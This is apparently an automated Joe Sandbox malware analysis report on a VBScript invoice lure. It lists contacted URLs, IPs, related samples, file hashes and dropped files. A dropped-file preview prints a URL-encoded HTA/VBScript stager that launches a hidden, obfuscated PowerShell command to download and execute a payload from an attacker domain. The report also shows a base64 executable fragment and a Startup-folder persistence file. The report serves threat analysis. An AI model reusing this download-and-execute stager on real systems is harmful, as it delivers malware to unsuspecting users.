                                            https://go.micropowershell.exe, 00000002.00000002.914665953.000001DEA7869000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://ahmedadel.work/cairo/Encoding.txtHmshta.exe, 00000001.00000002.651380882.000002454F69B000.00000004.00000020.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://ahmedadel.work/cairo/Encoding.txtC:mshta.exe, 00000001.00000002.651459548.000002454F711000.00000004.00000020.sdmp, mshta.exe, 00000001.00000002.651331087.000002454F660000.00000004.00000020.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://certs.godaddy.com/repository/1301powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmpfalse
                                              		high
                                              https://ia801503.us.archive.orgpowershell.exe, 00000002.00000002.910230199.000001DEA69FC000.00000004.00000001.sdmpfalse
                                                		high
                                                https://contoso.com/Iconpowershell.exe, 00000002.00000002.915900711.000001DEB5C72000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://ahmedadel.work/cairo/Server.txtXpowershell.exe, 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://ahmedadel.work/cairo/Encoding.txt0wscript.exe, 00000000.00000003.637242970.000001CFFB729000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://ia801503.us.archive.org/13/items/startup_20210219/Startup.txtpowershell.exe, 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.910230199.000001DEA69FC000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.909554931.000001DEA68B8000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://certs.godaddy.com/repository/0powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://ahmedadel.work/cairo/Encoding.txtPROFILE_Sxfmshta.exe, 00000001.00000002.651705439.000002454F8C0000.00000004.00000040.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://ahmedadel.work/cairo/Encoding.txt7mshta.exe, 00000001.00000002.651499116.000002454F73A000.00000004.00000020.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://ahmedadel.work/cairo/Encoding.txtionalmwmshta.exe, 00000001.00000002.651371236.000002454F695000.00000004.00000020.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.917186570.000001DEBE16A000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.905662877.000001DEA5E21000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://crl.godaddy.com/gdroot-g2.crl0Fpowershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://ahmedadel.work/cairo/Encoding.txtndowsmshta.exe, 00000001.00000002.651371236.000002454F695000.00000004.00000020.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://ia801503.us.archive.orgpowershell.exe, 00000002.00000002.910338549.000001DEA6A4C000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://ahmedadel.work/cairo/ALL.txtXpowershell.exe, 00000002.00000002.908984002.000001DEA67A2000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://crl.godaddy.com/gdroot.crl0Fpowershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://ahmedadel.work/cairo/ALL.txt%27%27%29%27%3B%24TC%3DI%60E%60X%20%28%24c1%2C%24c4%2C%24c3%20-Jomshta.exe, 00000001.00000002.651515709.000002454F74E000.00000004.00000001.sdmp, mshta.exe, 00000001.00000002.652619299.0000024D52298000.00000004.00000001.sdmp, Encoding[1].txt.1.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown

                                                            Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            193.23.3.13
                                                            		unknownunknown
                                                            		207083HOSTSLIM-GLOBAL-NETWORKNLfalse
                                                            212.64.222.172
                                                            		unknownTurkey
                                                            		12599ATLAS-ASTRtrue
                                                            207.241.228.153
                                                            		unknownUnited States
                                                            		7941INTERNET-ARCHIVEUSfalse

                                                            General Information

                                                            Joe Sandbox Version:31.0.0 Emerald
                                                            Analysis ID:359309
                                                            Start date:27.02.2021
                                                            Start time:19:17:17
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 8m 31s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Sample file name:Invoice-ID-(882451).vbs
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                            Number of analysed new started processes analysed:11
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.phis.troj.evad.winVBS@18/18@5/3
                                                            EGA Information:Failed
                                                            HDC Information:Failed
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 169
                                                            • Number of non-executed functions: 1
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found application associated with file extension: .vbs
                                                            Warnings:
                                                            Show All
                                                            • Excluded IPs from analysis (whitelisted): 104.43.139.144, 13.88.21.125, 104.43.193.48, 40.88.32.150, 13.64.90.137, 8.248.145.254, 67.27.235.254, 67.27.158.254, 8.253.95.120, 8.241.11.126
                                                            • Excluded domains from analysis (whitelisted): skypedataprdcoleus15.cloudapp.net, skypedataprdcolwus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net, skypedataprdcolcus15.cloudapp.net
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            19:18:04API Interceptor151x Sleep call for process: powershell.exe modified
                                                            19:18:15AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.hta
                                                            19:18:39API Interceptor2x Sleep call for process: aspnet_compiler.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            No context

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            clayroot2016.linkpc.netInvoice ID-(4387206).vbsGet hashmaliciousBrowse
                                                            • 168.119.103.207
                                                            Invoice ID-(684472).vbsGet hashmaliciousBrowse
                                                            • 135.181.96.16
                                                            Payment Invoice##(6321210).vbsGet hashmaliciousBrowse
                                                            • 173.234.155.108

                                                            ASN

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            INTERNET-ARCHIVEUSPO#00187.pptGet hashmaliciousBrowse
                                                            • 207.241.227.118
                                                            Request for Quotation76584454.pptGet hashmaliciousBrowse
                                                            • 207.241.228.140
                                                            SKM_36721012514070-2.pptGet hashmaliciousBrowse
                                                            • 207.241.228.143
                                                            SOA - NCL INTER LOGISTICS.pptGet hashmaliciousBrowse
                                                            • 207.241.227.121
                                                            24.ppsGet hashmaliciousBrowse
                                                            • 207.241.224.2
                                                            4.ppsGet hashmaliciousBrowse
                                                            • 207.241.224.2
                                                            Offer Nr 0226.ppsGet hashmaliciousBrowse
                                                            • 207.241.224.2
                                                            Inquiry 09.pptGet hashmaliciousBrowse
                                                            • 207.241.228.143
                                                            Invoice ID-(4387206).vbsGet hashmaliciousBrowse
                                                            • 207.241.228.157
                                                            Ekz Payment.htmGet hashmaliciousBrowse
                                                            • 207.241.224.2
                                                            invoice-ID9411548.vbsGet hashmaliciousBrowse
                                                            • 207.241.227.122
                                                            Invoice ID-(684472).vbsGet hashmaliciousBrowse
                                                            • 207.241.227.112
                                                            Payment Invoice##(6321210).vbsGet hashmaliciousBrowse
                                                            • 207.241.227.121
                                                            Order List and Quantities.pptGet hashmaliciousBrowse
                                                            • 207.241.228.142
                                                            https://protect-us.mimecast.com/s/sQmcCn5YzpcGLR8q4SJaZjF?domain=mobilitywithlove.com/Get hashmaliciousBrowse
                                                            • 207.241.226.190
                                                            Order List and Quantities.pptGet hashmaliciousBrowse
                                                            • 207.241.228.142
                                                            Price List.pptGet hashmaliciousBrowse
                                                            • 207.241.228.142
                                                            Standardequips_Quote.pptGet hashmaliciousBrowse
                                                            • 207.241.227.115
                                                            Purchase list.pptGet hashmaliciousBrowse
                                                            • 207.241.228.142

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            54328bd36c14bd82ddaa0c04b25ed9adSecuriteInfo.com.Mal.Generic-S.247.exeGet hashmaliciousBrowse
                                                            • 207.241.228.153
                                                            ORDER0023490923.exeGet hashmaliciousBrowse
                                                            • 207.241.228.153
                                                            ORDER009882377343.exeGet hashmaliciousBrowse
                                                            • 207.241.228.153
                                                            PO - RFQ # 097663899.exeGet hashmaliciousBrowse
                                                            • 207.241.228.153
                                                            Transfer Forms.exeGet hashmaliciousBrowse
                                                            • 207.241.228.153
                                                            DHL delivery 9808765668,pdf.exeGet hashmaliciousBrowse
                                                            • 207.241.228.153
                                                            TT copy.exeGet hashmaliciousBrowse
                                                            • 207.241.228.153
                                                            AKBANK, MT 103 SWIFT ODEME EMRI-USD-78,000.00..exeGet hashmaliciousBrowse
                                                            • 207.241.228.153
                                                            PO0082021FT20.exeGet hashmaliciousBrowse
                                                            • 207.241.228.153
                                                            AWB 9899691012 Clearance Doc.exeGet hashmaliciousBrowse
                                                            • 207.241.228.153
                                                            Purchase Order-147000015740.exeGet hashmaliciousBrowse
                                                            • 207.241.228.153
                                                            DHL SHIPMENT DOCUMENT.exeGet hashmaliciousBrowse
                                                            • 207.241.228.153
                                                            Transfer Forms.exeGet hashmaliciousBrowse
                                                            • 207.241.228.153
                                                            DHL_FORM_26022021_PDF.exeGet hashmaliciousBrowse
                                                            • 207.241.228.153
                                                            Shipment document.exeGet hashmaliciousBrowse
                                                            • 207.241.228.153
                                                            PO#SL20210224.exeGet hashmaliciousBrowse
                                                            • 207.241.228.153
                                                            07766554433.exeGet hashmaliciousBrowse
                                                            • 207.241.228.153
                                                            YnJ8kD7oW3.exeGet hashmaliciousBrowse
                                                            • 207.241.228.153
                                                            INVOICE-0899877.jarGet hashmaliciousBrowse
                                                            • 207.241.228.153
                                                            PROFORMA INVOICE.exeGet hashmaliciousBrowse
                                                            • 207.241.228.153

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\Public\Microsoft.ps1
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):227551
                                                            Entropy (8bit):4.5993247801112895
                                                            Encrypted:false
                                                            SSDEEP:1536:mcYQSNS8xyAFKdafDD/Q9mnTn2IHuzeNAUGOAD5J+HP41AykDENo1LFaOv7OHLJX:qZZZf3JT2ne5GLVJ+HP41Ayk4
                                                            MD5:D367A423C2C8A2CD0BC2A1C25C72BEC3
                                                            SHA1:3A3859C42E7B0D78E99567D002E3499F74160F31
                                                            SHA-256:93AE6D6E74B927676845C9F7385EC4440CAE23DB7EE0F4CB1D5AEB19D7085C9C
                                                            SHA-512:1B19D89517139872CCA30359A96CC0D143FB433926E5585CAB4DC8F67E2D8813BAC125DB29B1C8685E7B30E9DC0ADB9D09103225637EA19BF6B01D7807595B14
                                                            Malicious:false
                                                            Yara Hits:
                                                            • Rule: SUSP_PS1_FromBase64String_Content_Indicator, Description: Detects suspicious base64 encoded PowerShell expressions, Source: C:\Users\Public\Microsoft.ps1, Author: Florian Roth
                                                            Reputation:low
                                                            Preview: [Byte[]]$H1=[System.Convert]::FromBase64String('TVqQ||M||||E||||//8||Lg|||||||||Q|||||||||||||||||||||||||||||||||||||||||||||||g|||||4fug4|t|nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ|||||||||BQRQ||T|EE|HXhc88||||||||||O||DiEL|QY||BIB|||I||||||||XjEB|||g||||Q|E|||B||||g|||||g||B||||||||||E||||||||||Cg|Q||B|||||||||M|QIU||B|||B||||||E|||E|||||||||8||||||||||||||B|x|QBL|||||G|B|FQD|||||||||||||||||||||||||I|B||w|||DHM|E|H|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||I|||C|||||||||||||||CC|||Eg||||||||||||||C50ZXh0||||ZBEB|||g||||EgE|||Q||||||||||||||||||C|||G|uc2RhdGE||OgB||||Q|E|||I||||W|Q||||||||||||||||B|||D|LnJzcmM|||BU|w|||G|B|||E||||G|E|||||||||||||||||Q|||QC5yZWxvYw||D|||||C||Q|||g|||BwB|||||||||||||||||E|||EI|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                            Category:dropped
                                                            Size (bytes):59134
                                                            Entropy (8bit):7.995450161616763
                                                            Encrypted:true
                                                            SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                            MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                            SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                            SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                            SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:data
                                                            Category:modified
                                                            Size (bytes):328
                                                            Entropy (8bit):3.0908522464605643
                                                            Encrypted:false
                                                            SSDEEP:6:kKjtT+bqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:7JH3kPlE99SNxAhUeo+aKt
                                                            MD5:FE8CA48BFAAC2FB259F4EAA2A39686B8
                                                            SHA1:03BEA86D0D3BEE3B83C71B817658914BFC55F8F5
                                                            SHA-256:5D52DD2D2FDA131113633BEF283B3D6AD3313A4AAF02DCDFE2C9C345C77720AF
                                                            SHA-512:D354637ECC3A45EA466F06EEB5EECAC76856B23BB63C8B712FC7EC9A5760B79C8E5B690EE65C3EF74E35F0A4937766027BBA9B54B4A7D0C92D713A2797511F8F
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: p...... ............4...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aspnet_compiler.exe.log
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):425
                                                            Entropy (8bit):5.340009400190196
                                                            Encrypted:false
                                                            SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
                                                            MD5:CC144808DBAF00E03294347EADC8E779
                                                            SHA1:A3434FC71BA82B7512C813840427C687ADDB5AEA
                                                            SHA-256:3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
                                                            SHA-512:A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Encoding[1].txt
                                                            Process:C:\Windows\System32\mshta.exe
                                                            File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                            Category:downloaded
                                                            Size (bytes):583
                                                            Entropy (8bit):5.228576960295449
                                                            Encrypted:false
                                                            SSDEEP:12:6O70dK2OB1YRGgc/XHLC/GObqrj+09G5K/X227DKxgYRIYJYb:Z0dKz8GgcfrCXuGp5K/9+Xejb
                                                            MD5:FF381AA7F929176FCEDA5D54472A0670
                                                            SHA1:5B491D0D86375282D9453D876D441231630CBE57
                                                            SHA-256:2580ECB0C44544B0ED76A578BE09859DE445924887ABC093A335E3FB791F51FB
                                                            SHA-512:520C17930DDFE9D94B1C571799C79FF04D043D82B1FF0412AF472FCD50361448064010C66F3081B494BB723B1F05565409E0E7EFC0C6B9B05E7C4B59C43294A4
                                                            Malicious:false
                                                            IE Cache URL:http://ahmedadel.work/cairo/Encoding.txt
                                                            Preview: <script language=javascript>document.write(unescape('%3Cscript%20language%3D%22VBScript%22%3E%0AFunction%20var_func%28%29%0ADim%20ESRDTYGUHGYTFRHTCJVY%0Aset%20ESRDTYGUHGYTFRHTCJVY%20%3D%20CreateObject%28%22Wscript.Shell%22%29%0AESRDTYGUHGYTFRHTCJVY.run%20%22powershell%20%24c1%3D%27%28New-Object%20Net.We%27%3B%20%24c4%3D%27bClient%29.Downlo%27%3B%20%24c3%3D%27adString%28%27%27http://ahmedadel.work/cairo/ALL.txt%27%27%29%27%3B%24TC%3DI%60E%60X%20%28%24c1%2C%24c4%2C%24c3%20-Join%20%27%27%29%7CI%60E%60X%22%2C0%0AEnd%20Function%0Avar_func%0Aself.close%0A%3C/script%3E%0A'))</script>
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:modified
                                                            Size (bytes):9709
                                                            Entropy (8bit):4.934970090060573
                                                            Encrypted:false
                                                            SSDEEP:192:V9sm54R3YrKkup5xVsm5emlt9smop5/iMDOmEN3H+OHgF4xoeRH3YrKkhVsm5emM:B4hb8JiQ0HzAFF/ib4Pib464
                                                            MD5:4EFC98FEE03268480FE754BF2609133A
                                                            SHA1:5B2EF7E503FD89F07F0F85CFC6FD8CD9BE73B3A3
                                                            SHA-256:05C474DB7617417D6DAF433C0963867505061EFBE6D9387301B2A504D28D7267
                                                            SHA-512:52F6E111B6F48D878DCDF13F4F129329273F1B5894F4454F262011BB8786AD162430661459C5E91D667673C883B09456E2D49202C442795421710DC78A4DB182
                                                            Malicious:false
                                                            Preview: PSMODULECACHE.....y......I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope................I...C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\PSReadline.psd1........PSConsoleHostReadline........Get-PSReadlineOption........Set-PSReadlineKeyHandler........Get-PSReadlineKeyHandler........Set-PSReadlineOption........Remove-PSReadlineKeyHandler................a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource.....
                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0i5401lf.ebk.psm1
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview: 1
                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3nu2p5pt.m4c.ps1
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview: 1
                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fsrdhrwr.o0u.ps1
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview: 1
                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qwdo3uek.lly.psm1
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview: 1
                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0o4iy3h.v4q.ps1
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview: 1
                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zu0d2wkc.s5o.psm1
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview: 1
                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.hta
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1141
                                                            Entropy (8bit):3.6863669326931423
                                                            Encrypted:false
                                                            SSDEEP:24:Z0dIBv3iGabeCIt1lCzhDCQz+aKVQEp6u/hMv:ZasvSGcel6NijVQEUy6v
                                                            MD5:722C8E312C545FB3B5DD76DA488BCA65
                                                            SHA1:BADE3E1CBD72E9A7FC21B73FB9FF6BCDB7122AA4
                                                            SHA-256:D1362EF8AB9633B49D0DA13EBE0672C2BA2F23CE78584AEF6800D94FB92D0EBF
                                                            SHA-512:DBB17E53B56E310FACF3C537B08E81D6B4C99A5E7E463DE9196717EB554440EF190F4CB9EF6E321C06511B295B1DD8B035359F42C56B63F39B6FD0F59F77180F
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.hta, Author: Joe Security
